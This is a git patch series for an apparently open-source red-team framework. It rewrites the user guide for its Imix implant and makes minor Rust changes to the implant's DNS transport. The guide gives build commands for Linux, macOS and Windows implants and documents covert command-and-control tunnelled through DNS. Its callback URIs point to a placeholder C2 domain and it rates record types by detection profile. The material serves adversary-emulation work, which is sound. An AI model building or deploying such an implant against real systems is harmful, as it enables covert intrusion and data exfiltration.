This will expose the newly copied SDK into the container allowing cargo to link against the MacOS SDK. -```json - "mounts": [ - "source=${localEnv:HOME}${localEnv:USERPROFILE}/MacOSX.sdk,target=/MacOSX.sdk,readonly,type=bind" - ], -``` - -#### Build -*Reopen realm in devcontainer* -```bash -cd realm/implants/imix/ -# Tell the linker to use the MacOSX.sdk -export SDKROOT="/MacOSX.sdk/"; export RUSTFLAGS="-Clink-arg=-isysroot -Clink-arg=/MacOSX.sdk -Clink-arg=-F/MacOSX.sdk/System/Library/Frameworks -Clink-arg=-L/MacOSX.sdk/usr/lib -Clink-arg=-lresolv" - -export IMIX_SERVER_PUBKEY="" - -cargo zigbuild --release --target aarch64-apple-darwin -``` - - -### Windows - -```bash -# Build imix -cd realm/implants/imix/ - -export IMIX_CALLBACK_URI="http://localhost" - -# Build imix.exe - cargo build --release --target=x86_64-pc-windows-gnu -# Build imix.svc.exe -cargo build --release --features win_service --target=x86_64-pc-windows-gnu -# Build imix.dll -cargo build --release --lib --target=x86_64-pc-windows-gnu -``` - - -## DNS Transport Configuration - -The DNS transport enables covert C2 communication by tunneling traffic through DNS queries and responses. This transport supports multiple DNS record types (TXT, A, AAAA) and can use either specific DNS servers or the system's default resolver with automatic fallback. 
- -### DNS URI Format - -When using the DNS transport, configure `IMIX_CALLBACK_URI` with the following format: - -``` -dns://?domain=[&type=] -``` - -**Parameters:** -- `` - DNS server address(es), `*` to use system resolver, or comma-separated list (e.g., `8.8.8.8:53,1.1.1.1:53`) -- `domain` - Base domain for DNS queries (e.g., `c2.example.com`) -- `type` (optional) - DNS record type: `txt` (default), `a`, or `aaaa` - -**Examples:** - -```bash -# Use specific DNS server with TXT records (default) -export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com" - -# Use system resolver with fallbacks -export IMIX_CALLBACK_URI="dns://*?domain=c2.example.com" - -# Use multiple DNS servers with A records -export IMIX_CALLBACK_URI="dns://8.8.8.8:53,1.1.1.1:53?domain=c2.example.com&type=a" - -# Use AAAA records -export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com&type=aaaa" -``` - -### DNS Resolver Fallback - -When using `*` as the server, the agent uses system DNS servers followed by public resolvers (1.1.1.1, 8.8.8.8) as fallbacks. If system configuration cannot be read, only the public resolvers are used. When multiple servers are configured, the agent tries each server in order on every failed request until one succeeds, then uses the working server for subsequent requests. 
- -### Record Types - -| Type | Description | Use Case | -|------|-------------|----------| -| TXT | Text records (default) | Best throughput, data encoded in TXT RDATA | -| A | IPv4 address records | Lower profile, data encoded across multiple A records | -| AAAA | IPv6 address records | Medium profile, more data per record than A | - -### Protocol Details - -The DNS transport uses an async windowed protocol to handle UDP unreliability: - -- **Chunked transmission**: Large requests are split into chunks that fit within DNS query limits (253 bytes total domain length) -- **Windowed sending**: Up to 10 packets are sent concurrently -- **ACK/NACK protocol**: The server responds with acknowledgments for received chunks and requests retransmission of missing chunks -- **Automatic retries**: Failed chunks are retried up to 3 times before the request fails -- **CRC32 verification**: Data integrity is verified using CRC32 checksums - -**Limits:** -- Maximum data size: 50MB per request -- Maximum concurrent conversations on server: 10,000 +--- +title: Imix +tags: + - User Guide +description: Imix User Guide +permalink: user-guide/imix +--- +## Imix + +Imix is an offensive security implant designed for stealthy communication and adversary emulation. It functions as a [Beacon](/user-guide/terminology#beacon), receiving [Eldritch](/user-guide/terminology#eldritch) packages called [Tomes](/user-guide/terminology#tome) from a central server ([Tavern](/admin-guide/tavern)) and evaluating them on the host system. It currently supports [gRPC over HTTP(s)](https://grpc.io/) as it's primary communication mechanism, but can be extended to support additional transport channels (see the [developer guide](/dev-guide/tavern#agent-development) for more info). + +## Configuration + +Imix has compile-time configuration, that may be specified using environment variables during `cargo build`. 
+
+**We strongly recommend building agents inside the provided devcontainer `.devcontainer`**
+Building in the dev container limits variables that might cause issues and is the most tested way to compile.
+
+| Env Var | Description | Default | Required |
+| ------- | ----------- | ------- | -------- |
+| IMIX_CALLBACK_URI | URI for initial callbacks (must specify a scheme, e.g. `http://` or `dns://`) | `http://127.0.0.1:8000` | No |
+| IMIX_SERVER_PUBKEY | The public key for the tavern server (obtain from server using `curl $IMIX_CALLBACK_URI/status`). | automatic | Yes |
+| IMIX_CALLBACK_INTERVAL | Duration between callbacks, in seconds. | `5` | No |
+| IMIX_RETRY_INTERVAL | Duration to wait before restarting the agent loop if an error occurs, in seconds. | `5` | No |
+| IMIX_PROXY_URI | Override system settings for proxy URI over HTTP(S) (must specify a scheme, e.g. `https://`) | No proxy | No |
+| IMIX_HOST_ID | Manually specify the host ID for this beacon. Supersedes the file on disk. | - | No |
+| IMIX_RUN_ONCE | Imix will only do one callback and execution of queued tasks (may want to pair with runtime environment variable `IMIX_BEACON_ID`) | false | No |
+
+Imix has run-time configuration that may be specified using environment variables during execution.
+
+| Env Var | Description | Default | Required |
+| ------- | ----------- | ------- | -------- |
+| IMIX_BEACON_ID | The identifier to be used during callback (must be globally unique) | Random UUIDv4 | No |
+| IMIX_LOG | Log message level for debug builds. See below for more information. | INFO | No |
+
+
+
+## Logging
+
+At runtime, you may use the `IMIX_LOG` environment variable to control log levels and verbosity. See [these docs](https://docs.rs/pretty_env_logger/latest/pretty_env_logger/) for more information. **When building a release version of imix, logging is disabled** and is not included in the released binary. 
+
+## Installation
+
+The install subcommand executes embedded tomes similar to golem.
+It will loop through all embedded files looking for main.eldritch.
+Each main.eldritch will execute in a new thread. This is done to allow imix to install redundantly or install additional (non dependent) tools.
+
+Installation scripts are specified in the `realm/implants/imix/install_scripts` directory.
+
+This feature is currently under active development, and may change. We'll do our best to keep these docs updated in the meantime.
+
+## Functionality
+
+Imix derives all its functionality from the eldritch language.
+See the [Eldritch User Guide](/user-guide/eldritch) for more information.
+
+## Task management
+
+Imix can execute up to 127 threads concurrently; after that, the main imix thread will block behind other threads.
+Every callback interval imix will query each active thread for new output and relay that back to the c2. This means even long running tasks will report their status as new data comes in.
+
+## Proxy support
+
+Imix's default `grpc` transport supports http and https proxies for outbound communication.
+By default imix will try to determine the system's proxy settings:
+
+- On Linux reading the environment variables `http_proxy` and then `https_proxy`
+- On Windows - we cannot automatically determine the default proxy
+- On MacOS - we cannot automatically determine the default proxy
+- On FreeBSD - we cannot automatically determine the default proxy
+
+## Identifying unique hosts
+
+Imix communicates which host it's on to Tavern enabling operators to reliably perform per host actions. The default way that imix does this is through a file on disk. We recognize that this may be un-ideal for many situations so we've also provided an environment override and made it easy for admins managing a realm deployment to change how the bot determines uniqueness.
+
+Imix uses the `host_unique` library under `implants/lib/host_unique` to determine which host it's on. 
The `id` function will fail over all available options returning the first successful ID. If a method is unable to determine the uniqueness of a host it should return `None`.
+
+We recommend that you use the `File` for the most reliability:
+
+- Exists across reboots
+- Guaranteed to be unique per host (because the bot creates it)
+- Can be used by multiple instances of the beacon on the same host.
+
+If you cannot use the `File` selector we highly recommend manually setting the `Env` selector with the environment variable `IMIX_HOST_ID`. This will override the `File` one avoiding writes to disk but must be managed by the operators.
+
+For Windows hosts, a `Registry` selector is available, but must be enabled before compilation. See the [imix dev guide](/dev-guide/imix#host-selector) on how to enable it.
+
+If all uniqueness selectors fail, imix will randomly generate a UUID to avoid crashing.
+This isn't ideal as in the UI each new beacon will appear as though it were on a new host.
+
+## Static cross compilation
+
+**We strongly recommend building agents inside the provided devcontainer `.devcontainer`**
+Building in the dev container limits variables that might cause issues and is the most tested way to compile.
+
+**Imix requires a server public key so it can encrypt messages to and from the server; check the server log for `level=INFO msg="public key: "`. This base64 encoded string should be passed to the agent using the environment variable `IMIX_SERVER_PUBKEY`**
+
+## Optional build flags
+
+These flags are passed to cargo build Eg.:
+`cargo build --release --bin imix --target=x86_64-unknown-linux-musl --features foo-bar`
+
+- `--features grpc-doh` - Enable DNS over HTTP using cloudflare DNS for the grpc transport
+- `--features http1 --no-default-features` - Changes the default grpc transport to use HTTP/1.1. Requires running the http redirector.
+- `--features dns --no-default-features` - Changes the default grpc transport to use DNS. 
Requires running the dns redirector. See the [DNS Transport Configuration](#dns-transport-configuration) section for more information on how to configure the DNS transport URI.
+
+## Setting encryption key
+
+By default imix will automatically collect the IMIX_CALLBACK_URI server's public key during the build process. This can be overridden by manually setting the `IMIX_SERVER_PUBKEY` environment variable but should only be necessary when using redirectors. Redirectors have no visibility into the realm encryption by design; this means that agents must be compiled with the upstream tavern instance's public key.
+
+A server's public key can be found using:
+```bash
+export IMIX_SERVER_PUBKEY="$(curl $IMIX_CALLBACK_URI/status | jq -r '.Pubkey')"
+```
+
+### Linux
+
+```bash
+rustup target add x86_64-unknown-linux-musl
+
+sudo apt update
+sudo apt install musl-tools
+cd realm/implants/imix/
+export IMIX_CALLBACK_URI="http://localhost"
+
+cargo build --release --bin imix --target=x86_64-unknown-linux-musl
+```
+
+### MacOS
+
+**MacOS does not support static compilation**
+
+
+[Apple's SDK and XCode TOS](https://www.apple.com/legal/sla/docs/xcode.pdf) require compilation be performed on apple hardware. Rust doesn't support cross compiling Linux -> MacOS out of the box due to dependencies on the above SDKs. In order to cross compile you first need to make the SDK available to the runtime. Below we've documented how you can compile MacOS binaries from the Linux devcontainer.
+
+#### Setup
+Setup the MacOS SDK in a place that docker can access.
+Rancher desktop doesn't allow you to mount folders besides ~/ and /tmp/
+therefore we need to copy it into an accessible location.
+Run the following on your MacOS host:
+
+```bash
+sudo cp -r $(readlink -f $(xcrun --sdk macosx --show-sdk-path)) ~/MacOSX.sdk
+```
+
+Modify .devcontainer/devcontainer.json by uncommenting the MacOSX.sdk mount. 
This will expose the newly copied SDK into the container allowing cargo to link against the MacOS SDK. +```json + "mounts": [ + "source=${localEnv:HOME}${localEnv:USERPROFILE}/MacOSX.sdk,target=/MacOSX.sdk,readonly,type=bind" + ], +``` + +#### Build +*Reopen realm in devcontainer* +```bash +cd realm/implants/imix/ +# Tell the linker to use the MacOSX.sdk +export SDKROOT="/MacOSX.sdk/"; export RUSTFLAGS="-Clink-arg=-isysroot -Clink-arg=/MacOSX.sdk -Clink-arg=-F/MacOSX.sdk/System/Library/Frameworks -Clink-arg=-L/MacOSX.sdk/usr/lib -Clink-arg=-lresolv" + +export IMIX_SERVER_PUBKEY="" + +cargo zigbuild --release --target aarch64-apple-darwin +``` + + +### Windows + +```bash +# Build imix +cd realm/implants/imix/ + +export IMIX_CALLBACK_URI="http://localhost" + +# Build imix.exe + cargo build --release --target=x86_64-pc-windows-gnu +# Build imix.svc.exe +cargo build --release --features win_service --target=x86_64-pc-windows-gnu +# Build imix.dll +cargo build --release --lib --target=x86_64-pc-windows-gnu +``` + + +## DNS Transport Configuration + +The DNS transport enables covert C2 communication by tunneling traffic through DNS queries and responses. This transport supports multiple DNS record types (TXT, A, AAAA) and can use either specific DNS servers or the system's default resolver with automatic fallback. 
+ +### DNS URI Format + +When using the DNS transport, configure `IMIX_CALLBACK_URI` with the following format: + +``` +dns://?domain=[&type=] +``` + +**Parameters:** +- `` - DNS server address(es), `*` to use system resolver, or comma-separated list (e.g., `8.8.8.8:53,1.1.1.1:53`) +- `domain` - Base domain for DNS queries (e.g., `c2.example.com`) +- `type` (optional) - DNS record type: `txt` (default), `a`, or `aaaa` + +**Examples:** + +```bash +# Use specific DNS server with TXT records (default) +export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com" + +# Use system resolver with fallbacks +export IMIX_CALLBACK_URI="dns://*?domain=c2.example.com" + +# Use multiple DNS servers with A records +export IMIX_CALLBACK_URI="dns://8.8.8.8:53,1.1.1.1:53?domain=c2.example.com&type=a" + +# Use AAAA records +export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com&type=aaaa" +``` + +### DNS Resolver Fallback + +When using `*` as the server, the agent uses system DNS servers followed by public resolvers (1.1.1.1, 8.8.8.8) as fallbacks. If system configuration cannot be read, only the public resolvers are used. When multiple servers are configured, the agent tries each server in order on every failed request until one succeeds, then uses the working server for subsequent requests. 
+ +### Record Types + +| Type | Description | Use Case | +|------|-------------|----------| +| TXT | Text records (default) | Best throughput, data encoded in TXT RDATA | +| A | IPv4 address records | Lower profile, data encoded across multiple A records | +| AAAA | IPv6 address records | Medium profile, more data per record than A | + +### Protocol Details + +The DNS transport uses an async windowed protocol to handle UDP unreliability: + +- **Chunked transmission**: Large requests are split into chunks that fit within DNS query limits (253 bytes total domain length) +- **Windowed sending**: Up to 10 packets are sent concurrently +- **ACK/NACK protocol**: The server responds with acknowledgments for received chunks and requests retransmission of missing chunks +- **Automatic retries**: Failed chunks are retried up to 3 times before the request fails +- **CRC32 verification**: Data integrity is verified using CRC32 checksums + +**Limits:** +- Maximum data size: 50MB per request +- Maximum concurrent conversations on server: 10,000 From ac32da5c2da1ac29736377e621c747463dd6d7bd Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Thu, 25 Dec 2025 12:49:02 -0600 Subject: [PATCH 16/17] debug assertions, constant for dns buf size, move docs section --- docs/_docs/user-guide/imix.md | 117 +++++++++++++++--------------- implants/Cargo.toml | 1 + implants/lib/transport/Cargo.toml | 2 +- implants/lib/transport/src/dns.rs | 11 ++- 4 files changed, 69 insertions(+), 62 deletions(-) diff --git a/docs/_docs/user-guide/imix.md b/docs/_docs/user-guide/imix.md index f291c861f..3c1bca382 100644 --- a/docs/_docs/user-guide/imix.md +++ b/docs/_docs/user-guide/imix.md @@ -33,7 +33,64 @@ Imix has run-time configuration, that may be specified using environment variabl | IMIX_BEACON_ID | The identifier to be used during callback (must be globally unique) | Random UUIDv4 | No | | IMIX_LOG | Log message level for debug builds. 
See below for more information. | INFO | No | +## DNS Transport Configuration + +The DNS transport enables covert C2 communication by tunneling traffic through DNS queries and responses. This transport supports multiple DNS record types (TXT, A, AAAA) and can use either specific DNS servers or the system's default resolver with automatic fallback. + +### DNS URI Format + +When using the DNS transport, configure `IMIX_CALLBACK_URI` with the following format: + +``` +dns://<server>?domain=<domain>[&type=<type>] +``` + +**Parameters:** +- `<server>` - DNS server address(es), `*` to use system resolver, or comma-separated list (e.g., `8.8.8.8:53,1.1.1.1:53`) +- `domain` - Base domain for DNS queries (e.g., `c2.example.com`) +- `type` (optional) - DNS record type: `txt` (default), `a`, or `aaaa` + +**Examples:** +```bash +# Use specific DNS server with TXT records (default) +export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com" + +# Use system resolver with fallbacks +export IMIX_CALLBACK_URI="dns://*?domain=c2.example.com" + +# Use multiple DNS servers with A records +export IMIX_CALLBACK_URI="dns://8.8.8.8:53,1.1.1.1:53?domain=c2.example.com&type=a" + +# Use AAAA records +export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com&type=aaaa" +``` + +### DNS Resolver Fallback + +When using `*` as the server, the agent uses system DNS servers followed by public resolvers (1.1.1.1, 8.8.8.8) as fallbacks. If system configuration cannot be read, only the public resolvers are used. When multiple servers are configured, the agent tries each server in order on every failed request until one succeeds, then uses the working server for subsequent requests.
+ +### Record Types + +| Type | Description | Use Case | +|------|-------------|----------| +| TXT | Text records (default) | Best throughput, data encoded in TXT RDATA | +| A | IPv4 address records | Lower profile, data encoded across multiple A records | +| AAAA | IPv6 address records | Medium profile, more data per record than A | + +### Protocol Details + +The DNS transport uses an async windowed protocol to handle UDP unreliability: + +- **Chunked transmission**: Large requests are split into chunks that fit within DNS query limits (253 bytes total domain length) +- **Windowed sending**: Up to 10 packets are sent concurrently +- **ACK/NACK protocol**: The server responds with acknowledgments for received chunks and requests retransmission of missing chunks +- **Automatic retries**: Failed chunks are retried up to 3 times before the request fails +- **CRC32 verification**: Data integrity is verified using CRC32 checksums + +**Limits:** +- Maximum data size: 50MB per request +- Maximum concurrent conversations on server: 10,000 ## Logging @@ -178,63 +235,3 @@ cargo build --release --features win_service --target=x86_64-pc-windows-gnu # Build imix.dll cargo build --release --lib --target=x86_64-pc-windows-gnu ``` - - -## DNS Transport Configuration - -The DNS transport enables covert C2 communication by tunneling traffic through DNS queries and responses. This transport supports multiple DNS record types (TXT, A, AAAA) and can use either specific DNS servers or the system's default resolver with automatic fallback. 
- -### DNS URI Format - -When using the DNS transport, configure `IMIX_CALLBACK_URI` with the following format: - -``` -dns://<server>?domain=<domain>[&type=<type>] -``` - -**Parameters:** -- `<server>` - DNS server address(es), `*` to use system resolver, or comma-separated list (e.g., `8.8.8.8:53,1.1.1.1:53`) -- `domain` - Base domain for DNS queries (e.g., `c2.example.com`) -- `type` (optional) - DNS record type: `txt` (default), `a`, or `aaaa` - -**Examples:** - -```bash -# Use specific DNS server with TXT records (default) -export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com" - -# Use system resolver with fallbacks -export IMIX_CALLBACK_URI="dns://*?domain=c2.example.com" - -# Use multiple DNS servers with A records -export IMIX_CALLBACK_URI="dns://8.8.8.8:53,1.1.1.1:53?domain=c2.example.com&type=a" - -# Use AAAA records -export IMIX_CALLBACK_URI="dns://8.8.8.8:53?domain=c2.example.com&type=aaaa" -``` - -### DNS Resolver Fallback - -When using `*` as the server, the agent uses system DNS servers followed by public resolvers (1.1.1.1, 8.8.8.8) as fallbacks. If system configuration cannot be read, only the public resolvers are used. When multiple servers are configured, the agent tries each server in order on every failed request until one succeeds, then uses the working server for subsequent requests.
- -### Record Types - -| Type | Description | Use Case | -|------|-------------|----------| -| TXT | Text records (default) | Best throughput, data encoded in TXT RDATA | -| A | IPv4 address records | Lower profile, data encoded across multiple A records | -| AAAA | IPv6 address records | Medium profile, more data per record than A | - -### Protocol Details - -The DNS transport uses an async windowed protocol to handle UDP unreliability: - -- **Chunked transmission**: Large requests are split into chunks that fit within DNS query limits (253 bytes total domain length) -- **Windowed sending**: Up to 10 packets are sent concurrently -- **ACK/NACK protocol**: The server responds with acknowledgments for received chunks and requests retransmission of missing chunks -- **Automatic retries**: Failed chunks are retried up to 3 times before the request fails -- **CRC32 verification**: Data integrity is verified using CRC32 checksums - -**Limits:** -- Maximum data size: 50MB per request -- Maximum concurrent conversations on server: 10,000 diff --git a/implants/Cargo.toml b/implants/Cargo.toml index 32d1f3a3c..34a30e6d2 100644 --- a/implants/Cargo.toml +++ b/implants/Cargo.toml @@ -61,6 +61,7 @@ anyhow = "1.0.65" assert_cmd = "2.0.6" async-recursion = "1.0.0" async-trait = "0.1.68" +base32 = "0.5" base64 = "0.21.4" chrono = "0.4.34" const-decoder = "0.3.0" diff --git a/implants/lib/transport/Cargo.toml b/implants/lib/transport/Cargo.toml index bedf5abfb..f4695f44d 100644 --- a/implants/lib/transport/Cargo.toml +++ b/implants/lib/transport/Cargo.toml @@ -29,7 +29,7 @@ hyper = { version = "0.14", features = [ ] } # Had to user an older version of hyper to support hyper-proxy hyper-proxy = {version = "0.9.1", default-features = false, features = ["rustls"]} hickory-resolver = { version = "0.24", features = ["dns-over-https-rustls", "webpki-roots"], optional = true } -base32 = { version = "0.5", optional = true } +base32 = { workspace = true, optional = true } rand = { 
workspace = true, optional = true } url = { version = "2.5", optional = true } diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs index 20c29adfd..cef8ece3b 100644 --- a/implants/lib/transport/src/dns.rs +++ b/implants/lib/transport/src/dns.rs @@ -10,6 +10,7 @@ use tokio::net::UdpSocket; const MAX_LABEL_LENGTH: usize = 63; const MAX_DNS_NAME_LENGTH: usize = 253; const CONV_ID_LENGTH: usize = 8; +const DNS_RESPONSE_BUF_SIZE: usize = 4096; // Async protocol configuration const SEND_WINDOW_SIZE: usize = 10; // Packets in flight @@ -215,7 +216,7 @@ impl DNS { socket.send(query).await?; // Receive response with timeout - let mut buf = vec![0u8; 4096]; + let mut buf = vec![0u8; DNS_RESPONSE_BUF_SIZE]; let timeout_duration = std::time::Duration::from_secs(5); let len = tokio::time::timeout(timeout_duration, socket.recv(&mut buf)) .await @@ -424,6 +425,7 @@ impl DNS { let data_crc = Self::calculate_crc32(request_data); + #[cfg(debug_assertions)] log::debug!( "DNS: Request size={} bytes, chunks={}, chunk_size={} bytes, crc32={:#x}", request_data.len(), @@ -453,6 +455,7 @@ impl DNS { let mut init_payload_bytes = Vec::new(); init_payload.encode(&mut init_payload_bytes)?; + #[cfg(debug_assertions)] log::debug!( "DNS: INIT packet - conv_id={}, method={}, total_chunks={}, file_size={}, data_crc32={:#x}", conv_id, method_code, total_chunks, data_size, data_crc @@ -472,6 +475,8 @@ impl DNS { self.send_packet(init_packet) .await .context("failed to send INIT packet")?; + + #[cfg(debug_assertions)] log::debug!("DNS: INIT sent for conv_id={}", conv_id); Ok(()) @@ -503,6 +508,7 @@ impl DNS { } } } else { + #[cfg(debug_assertions)] log::debug!( "DNS: Unknown response format ({} bytes), retrying chunk", response_data.len() @@ -705,6 +711,7 @@ impl DNS { /// Fetch response from server, handling potentially chunked responses async fn fetch_response(&mut self, conv_id: &str, total_chunks: usize) -> Result> { + #[cfg(debug_assertions)] log::debug!( "DNS: All 
{} chunks acknowledged, sending FETCH", total_chunks @@ -725,6 +732,8 @@ impl DNS { .send_packet(fetch_packet) .await .context("failed to fetch response from server")?; + + #[cfg(debug_assertions)] log::debug!( "DNS: FETCH response received ({} bytes)", end_response.len() From 8de4767f46a5ceb216f9058181a447d9fa4be164 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Fri, 26 Dec 2025 19:30:24 -0600 Subject: [PATCH 17/17] move url dep to workspace --- implants/Cargo.toml | 1 + implants/lib/transport/Cargo.toml | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/implants/Cargo.toml b/implants/Cargo.toml index 34a30e6d2..9c40bb378 100644 --- a/implants/Cargo.toml +++ b/implants/Cargo.toml @@ -127,6 +127,7 @@ tonic-build = { git = "https://github.com/hyperium/tonic.git", rev = "c783652" } trait-variant = "0.1.1" uuid = "1.5.0" static_vcruntime = "2.0" +url = "2.5" which = "4.4.2" whoami = { version = "1.5.1", default-features = false } windows-service = "0.6.0" diff --git a/implants/lib/transport/Cargo.toml b/implants/lib/transport/Cargo.toml index f4695f44d..6f52aaad0 100644 --- a/implants/lib/transport/Cargo.toml +++ b/implants/lib/transport/Cargo.toml @@ -31,7 +31,7 @@ hyper-proxy = {version = "0.9.1", default-features = false, features = ["rustls" hickory-resolver = { version = "0.24", features = ["dns-over-https-rustls", "webpki-roots"], optional = true } base32 = { workspace = true, optional = true } rand = { workspace = true, optional = true } -url = { version = "2.5", optional = true } +url = { workspace = true, optional = true } # [feature = mock] mockall = { workspace = true, optional = true }